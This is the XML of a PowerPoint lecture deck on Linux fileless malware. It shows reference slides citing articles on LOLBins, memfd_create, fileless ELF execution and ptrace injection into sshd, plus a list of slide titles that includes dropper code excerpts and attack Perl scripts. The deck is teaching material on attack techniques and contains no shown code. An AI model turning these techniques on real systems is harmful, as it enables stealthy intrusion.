            <a:ext cx="8640960" cy="4032448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>What Are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>LOLBins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and How Do Attackers Use Them in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Attacks? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Yiftach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Keshet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>What are “/run/lock” and “/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>shm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>” used for? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Detecting Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Malware with Command Line Forensics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>sandflysecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Loading "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" Shared Objects (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>dlopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Juan Manuel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Fernández</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>解析 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>共享記憶體機制 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>jserv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>how does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> malware work on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>dr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>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4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39372430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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Warning: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> attacks are on the rise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Igor G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>New Research: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Malware Attacks Surge by 900% and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Cryptominers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Make a Comeback, While Ransomware Attacks Decline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>WatchGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>一種無檔案後門技巧 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>M0rk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>環境下無文件執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>spook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>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94</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331805014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How do I read from /proc/$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/mem under Linux? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Stackexchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> introduction AKA injecting into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> for fun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Adam Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="投影片編號版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>95</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20846961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波形">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6810</TotalTime>
  <Words>5536</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>506</Paragraphs>
  <Slides>95</Slides>
  <Notes>0</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95</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="102" baseType="lpstr">
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Candara</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>波形</vt:lpstr>
      <vt:lpstr>Linux Fileless Malware </vt:lpstr>
      <vt:lpstr>Differences of DLL injection between Windows and Linux  [Michael Genkin]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Command Injection [Weilin Zhong]</vt:lpstr>
      <vt:lpstr>Command Injection vs Code Injection [Weilin Zhong]</vt:lpstr>
      <vt:lpstr>Code Example 1 [Weilin Zhong]</vt:lpstr>
      <vt:lpstr>Attack Scenario [Weilin Zhong]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>memfd_create [man7.org]</vt:lpstr>
      <vt:lpstr>Files Created by memfd_create() [man7.org]</vt:lpstr>
      <vt:lpstr>Argument name [man7.org]</vt:lpstr>
      <vt:lpstr>Anonymous File (/proc/&lt;PID&gt;/fd) Example [Stuart]</vt:lpstr>
      <vt:lpstr>memfd_create [David Herrmann]</vt:lpstr>
      <vt:lpstr>Property 1 [David Herrmann]</vt:lpstr>
      <vt:lpstr>Property 2 [David Herrmann]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Dropper Code (evil) Excerpt [M0rk]</vt:lpstr>
      <vt:lpstr>Execution [M0rk]</vt:lpstr>
      <vt:lpstr>Execution Scenario [M0rk] </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Pre-installed Software That Can Be Used to Execute Code [FBK CyberSecurity] </vt:lpstr>
      <vt:lpstr>Where the File Created by memfd_create Are Stored [FBK CyberSecurity] </vt:lpstr>
      <vt:lpstr>A Scenario of Fileless Malware Execution</vt:lpstr>
      <vt:lpstr>Execution through Interpreters</vt:lpstr>
      <vt:lpstr>Execution Flow</vt:lpstr>
      <vt:lpstr>memfd_create() [FBK CyberSecurity] </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Names of Attack Perl Scripts</vt:lpstr>
      <vt:lpstr>Operation Steps[itw01.com] </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Invoke memfd_create in Perl [Stuart] </vt:lpstr>
      <vt:lpstr>From an Already-open File Descriptor to a File Handle [Stuart]</vt:lpstr>
      <vt:lpstr>Code [itw01.com]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Transfer a binary into Perl print statements [Stuart]</vt:lpstr>
      <vt:lpstr>Explanation[Stuart]</vt:lpstr>
      <vt:lpstr>Diamond Operator (1) [Gabor Szabo]</vt:lpstr>
      <vt:lpstr>Diamond Operator (2) [Gabor Szabo]</vt:lpstr>
      <vt:lpstr>Execution [itw01.com]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Code [itw01.com]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Ptrace Protocol [高魁良]</vt:lpstr>
      <vt:lpstr>Some Actions Specified by Argument request [Adam Chester]</vt:lpstr>
      <vt:lpstr>ptrace [Linux manual page]</vt:lpstr>
      <vt:lpstr>Tracee vs. Thread [Linux manual page]</vt:lpstr>
      <vt:lpstr>ptrace call [Linux manual page]</vt:lpstr>
      <vt:lpstr>Initialize a Trace [Linux manual page]</vt:lpstr>
      <vt:lpstr>When a Tracee will Stop [Linux manual page]</vt:lpstr>
      <vt:lpstr>When a Tracer will be Notified        [Linux manual page]</vt:lpstr>
      <vt:lpstr>Inspect and Mofidy a Tracee           [Linux manual page]</vt:lpstr>
      <vt:lpstr>Stop Tracing [Linux manual page]</vt:lpstr>
      <vt:lpstr>waitpid() — Wait for a Specific Child Process to End [IBM]</vt:lpstr>
      <vt:lpstr>Process Completion Status [GNU]</vt:lpstr>
      <vt:lpstr>How to Read and Write Other Process Memory [Chris Wellons]</vt:lpstr>
      <vt:lpstr>File View of a Process’ Entire Address Space [Chris Wellons]</vt:lpstr>
      <vt:lpstr>Attach a Process That You Want to Read or Write [Chris Wellons]</vt:lpstr>
      <vt:lpstr>File /proc/PID/maps [Adam Chester]</vt:lpstr>
      <vt:lpstr>Example of File /proc/PID/maps [Adam Chester]</vt:lpstr>
      <vt:lpstr>Search /proc/PID/maps [Adam Chester]</vt:lpstr>
      <vt:lpstr>Write/Read [Chris Wellons]</vt:lpstr>
      <vt:lpstr> process_vm_readv()</vt:lpstr>
      <vt:lpstr>process_vm_writev()</vt:lpstr>
      <vt:lpstr>GDB Allow Writes to Non-writable Addresses [Mark Plotnick]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> Scenario (1) [Ben Nick]</vt:lpstr>
      <vt:lpstr> Scenario (2) [Ben Nick]</vt:lpstr>
      <vt:lpstr> Scenario (3) [Ben Nick]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>mmap [man7.org] </vt:lpstr>
      <vt:lpstr>How to use mmap function in C language? [Bamdeb Ghosh]</vt:lpstr>
      <vt:lpstr>The mmap() System Call             [Alan L. Cox et al.]</vt:lpstr>
      <vt:lpstr>Usage [man7.org]</vt:lpstr>
      <vt:lpstr>Argument addr [man7.org]</vt:lpstr>
      <vt:lpstr>File Mapping [man7.org]</vt:lpstr>
      <vt:lpstr>prot Argument [man7.org]</vt:lpstr>
      <vt:lpstr>flags Argument [man7.org]</vt:lpstr>
      <vt:lpstr>Return Value [man7.org]</vt:lpstr>
      <vt:lpstr>What Is “Living off the Land?”        [Yiftach Keshet] </vt:lpstr>
      <vt:lpstr>Linux Malware Authors Use Ezuri Golang crypter for Zero Detection  [Ax Sharma]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Subdirectory of /proc [itread01.com] </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Storage of an File Created by memfd_create[man7.org]</vt:lpstr>
      <vt:lpstr>Anonymous Memory                 [kernel development community]</vt:lpstr>
      <vt:lpstr>Property 1 [David Herrmann]</vt:lpstr>
      <vt:lpstr>truncate, ftruncate [die.net]</vt:lpstr>
      <vt:lpstr>Description [die.net]</vt:lpstr>
      <vt:lpstr>Caution [die.net]</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Linux Fileless Malware </dc:title>
  <dc:creator>hsufh</dc:creator>
  <cp:lastModifiedBy>又恩</cp:lastModifiedBy>
  <cp:revision>174</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-29T01:41:56Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-03T07:41:46Z</dcterms:modified>
</cp:coreProperties>
</file>